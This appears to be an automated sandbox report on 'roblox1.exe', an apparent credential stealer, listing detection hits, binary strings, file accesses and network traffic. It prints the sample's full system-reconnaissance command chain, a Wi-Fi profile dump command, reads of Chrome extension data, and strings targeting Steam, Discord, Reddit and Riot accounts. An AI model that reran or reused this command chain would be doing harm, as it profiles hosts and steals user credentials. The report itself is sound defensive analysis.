Source: Process started; Author: frack113; Data: Command: sc query type= service state= all, CommandLine: sc query type= service state= all, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5224, ParentProcessName: cmd.exe, ProcessCommandLine: sc query type= service state= all, ProcessId: 7116, ProcessName: sc.exe
Source: Process started; Author: frack113; Data: Command: hostname, CommandLine: hostname, CommandLine|base64offset|contains: -, Image: C:\Windows\System32\HOSTNAME.EXE, NewProcessName: C:\Windows\System32\HOSTNAME.EXE, OriginalFileName: C:\Windows\System32\HOSTNAME.EXE, ParentCommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5224, ParentProcessName: cmd.exe, ProcessCommandLine: hostname, ProcessId: 5836, ProcessName: HOSTNAME.EXE
Source: Process started; Author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'; Data: Command: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", CommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\Desktop\roblox1.exe, ParentImage: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe, ParentProcessId: 3428, ParentProcessName: stub.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ##

                  Stealing of Sensitive Information

                  Source: Process started, Author: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /c "netsh wlan show profiles", CommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profiles", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\Desktop\roblox1.exe, ParentImage: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe, ParentProcessId: 3428, ParentProcessName: stub.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profiles", ProcessId: 6168, ProcessName: cmd.exe
                  No Suricata rule has matched

                  AV Detection

                  Source: C:\Users\user\AppData\Local\MonsterUpdateService\Monster.exe, ReversingLabs: Detection: 55%
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe, ReversingLabs: Detection: 70%
                  Source: roblox1.exe, ReversingLabs: Detection: 55%
                  Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.9% probability
                  Source: C:\Users\user\AppData\Local\MonsterUpdateService\Monster.exe, Joe Sandbox ML: detected
                  Source: roblox1.exe, Joe Sandbox ML: detected

                  Phishing

                  Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\net.exe net user administrator
                  Source: C:\Windows\System32\net.exe, Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user administrator
                  Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\net.exe net user administrator
                  Source: C:\Windows\System32\net.exe, Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user administrator
                  Source: roblox1.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                  Source: Binary string: C:\A\40\b\bin\amd64\sqlite3.pdb source: roblox1.exe, 00000000.00000003.1539994673.000001B301922000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: cryptography_rust.pdbc source: roblox1.exe, 00000000.00000003.1539994673.000001B301C9A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: D:\_w\1\b\libssl-1_1.pdb source: roblox1.exe, 00000000.00000003.1539994673.000001B301567000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1953260784.00007FFBA9EE5000.00000002.00000001.01000000.00000013.sdmp
                  Source: Binary string: C:\A\40\b\bin\amd64\_uuid.pdb source: stub.exe, 00000003.00000002.1965068421.00007FFBBBE92000.00000002.00000001.01000000.00000020.sdmp
                  Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: roblox1.exe, 00000000.00000003.1539994673.000001B3013F1000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1954163213.00007FFBAA16F000.00000002.00000001.01000000.00000014.sdmp
                  Source: Binary string: C:\A\40\b\bin\amd64\python3.pdb source: roblox1.exe, 00000000.00000003.1539994673.000001B30158A000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1945909540.00000213BE720000.00000002.00000001.01000000.0000000E.sdmp
                  Source: Binary string: C:\A\40\b\bin\amd64\_ctypes.pdb source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1965877888.00007FFBBC260000.00000002.00000001.01000000.00000007.sdmp
                  Source: Binary string: C:\A\40\b\bin\amd64\_queue.pdb source: stub.exe, 00000003.00000002.1964238411.00007FFBBB553000.00000002.00000001.01000000.00000025.sdmp
                  Source: Binary string: C:\A\40\b\bin\amd64\_sqlite3.pdb source: stub.exe, 00000003.00000002.1964051788.00007FFBBAF4C000.00000002.00000001.01000000.0000000B.sdmp
                  Source: Binary string: C:\A\40\b\bin\amd64\python310.pdb source: roblox1.exe, 00000000.00000003.1539994673.000001B301922000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1961361267.00007FFBAAD33000.00000002.00000001.01000000.00000005.sdmp
                  Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1n 15 Mar 2022built on: Tue Mar 15 18:32:50 2022 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: roblox1.exe, 00000000.00000003.1539994673.000001B3013F1000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1954163213.00007FFBAA16F000.00000002.00000001.01000000.00000014.sdmp
                  Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: roblox1.exe, 00000000.00000003.1539994673.000001B301C9A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\A\40\b\bin\amd64\_asyncio.pdb source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1963452510.00007FFBB5C17000.00000002.00000001.01000000.00000015.sdmp
                  Source: Binary string: C:\A\40\b\bin\amd64\select.pdb source: roblox1.exe, 00000000.00000003.1539994673.000001B301922000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1966370178.00007FFBBC9F3000.00000002.00000001.01000000.00000011.sdmp
                  Source: Binary string: C:\A\40\b\bin\amd64\unicodedata.pdb source: roblox1.exe, 00000000.00000003.1539994673.000001B301C9A000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1952475865.00007FFBA9E5C000.00000002.00000001.01000000.00000019.sdmp
                  Source: Binary string: D:\_w\1\b\libssl-1_1.pdb@@ source: roblox1.exe, 00000000.00000003.1539994673.000001B301567000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1953260784.00007FFBA9EE5000.00000002.00000001.01000000.00000013.sdmp
                  Source: Binary string: C:\A\40\b\bin\amd64\_ssl.pdb source: stub.exe, 00000003.00000002.1963629139.00007FFBB5CBD000.00000002.00000001.01000000.00000012.sdmp, stub.exe, 00000003.00000003.1552093383.00000213BE4C3000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: D:\a\_work\1\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: roblox1.exe, 00000000.00000003.1539994673.000001B301C9A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: cryptography_rust.pdb source: roblox1.exe, 00000000.00000003.1539994673.000001B301C9A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\A\40\b\bin\amd64\_bz2.pdb source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\A\40\b\bin\amd64\_hashlib.pdb source: stub.exe, 00000003.00000002.1965708695.00007FFBBC246000.00000002.00000001.01000000.00000018.sdmp
                  Source: Binary string: D:\_w\1\b\libcrypto-1_1.pdb source: stub.exe, 00000003.00000002.1954163213.00007FFBAA1F1000.00000002.00000001.01000000.00000014.sdmp
                  Source: Binary string: C:\A\40\b\bin\amd64\pyexpat.pdb source: roblox1.exe, 00000000.00000003.1539994673.000001B30158A000.00000004.00000020.00020000.00000000.sdmp

                  Spreading

                  Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\ARP.EXE arp -a
                  Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\ARP.EXE arp -a
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales

                  Networking

                  Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\NETSTAT.EXE netstat -ano
                  Source: Joe Sandbox View, IP Address: 208.95.112.1 208.95.112.1
                  Source: unknown, DNS query: name: ip-api.com
                  Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global traffic, HTTP traffic detected: GET /json HTTP/1.1 Host: ip-api.com Accept: */* Accept-Encoding: gzip, deflate User-Agent: Python/3.10 aiohttp/3.10.5
                  Source: global traffic, DNS traffic detected: DNS query: ip-api.com
                  Source: global traffic, DNS traffic detected: DNS query: restores.name
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B3014E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1946175818.00000213BE880000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://python.org
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1938094967.00000213BE55C000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1945319876.00000213BE561000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1551783756.00000213BE59C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://python.org/
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1946175818.00000213BE880000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://python.org:80
                  Source: stub.exe, 00000003.00000003.1937231343.00000213BE18E000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1939465237.00000213BEE32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: http://speleotrove.com/decimal/decarith.html
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B3014E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B3014E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B3014E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                  Source: stub.exe, 00000003.00000003.1934773835.00000213BEF56000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1936295098.00000213BEFCD000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1936075447.00000213BEFA1000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1934931290.00000213BEFB8000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1935684148.00000213BEFC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
                  Source: stub.exe, 00000003.00000003.1934346059.00000213BEE1F000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1947473880.00000213BEE1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl
                  Source: stub.exe, 00000003.00000003.1936295098.00000213BEFCD000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1934931290.00000213BEFB8000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1935684148.00000213BEFC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
                  Source: stub.exe, 00000003.00000003.1939279507.00000213BEFBF000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1934931290.00000213BEFB8000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1936295098.00000213BEFBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm
                  Source: stub.exe, 00000003.00000003.1936295098.00000213BEFCD000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1934931290.00000213BEFB8000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1935684148.00000213BEFC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm0U
                  Source: stub.exe, 00000003.00000003.1936295098.00000213BEFCD000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1939279507.00000213BEFBF000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1934931290.00000213BEFB8000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1936295098.00000213BEFBF000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1935684148.00000213BEFC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es00
                  Source: stub.exe, 00000003.00000003.1936295098.00000213BEFDF000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1939349578.00000213BEFEB000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1938008443.00000213BEFEB000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1945050010.00000213BE410000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1934931290.00000213BEFB8000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1936968912.00000213BEFE4000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1935684148.00000213BEFC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/
                  Source: stub.exe, 00000003.00000002.1945050010.00000213BE410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/:1U
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1944604841.00000213BE310000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.cl.cam.ac.uk/~mgk25/iso-time.html
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B3014E9000.00000004.00000020.00020000.00000000.sdmp, roblox1.exe, 00000000.00000003.1539994673.000001B301C9A000.00000004.00000020.00020000.00000000.sdmp, roblox1.exe, 00000000.00000003.1539994673.000001B301922000.00000004.00000020.00020000.00000000.sdmp, roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, roblox1.exe, 00000000.00000003.1539994673.000001B30158A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                  Source: stub.exe, 00000003.00000002.1948524629.00000213BEF1E000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1934896216.00000213BEF0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.firmaprofesional.com/cps0
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1940431612.00000213BE4FA000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1945192279.00000213BE4FC000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1552093383.00000213BE4C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1944387821.00000213BE210000.00000004.00001000.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: http://www.iana.org/time-zones/repository/tz-link.html
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1944387821.00000213BE210000.00000004.00001000.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
                  Source: stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps
                  Source: stub.exe, 00000003.00000003.1938775730.00000213BED9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
                  Source: stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cpsended_1it
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: http://wwwsearch.sf.net/):
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://account.riotgames.com/api/account/v1/user
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://account.riotgames.com/api/account/v1/userT
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.reddit.com/api/access_token
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://accounts.reddit.com/api/access_tokenaaccess_tokenuandroid:com.example.myredditapp:v1.2.3uBea
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://api.steampowered.com/IPlayerService/GetOwnedGames/v1/?key=440D7F4D810EF9298D25EDDF37C1F902&s
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://api.steampowered.com/IPlayerService/GetSteamLevel/v1/?key=440D7F4D810EF9298D25EDDF37C1F902&s
                  Source: stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/ISteamUser/GetPlayerSummaries/v0002/?key=440D7F4D810EF9298D25EDDF37C1F9
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940824169.00000213BED1E000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1937485075.00000213BECD9000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1944604841.00000213BE310000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://bugs.python.org/issue37179
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/avatars/
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://cdn.discordapp.com/avatars/u.pngu.gifuunsupported
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, stub.exe, 00000003.00000002.1962486464.00007FFBAAF8B000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: https://cffi.readthedocs.io/en/latest/using.html#callbacks
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B301C9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io/en/latest/faq/#why-can-t-i-import-my-pem-file
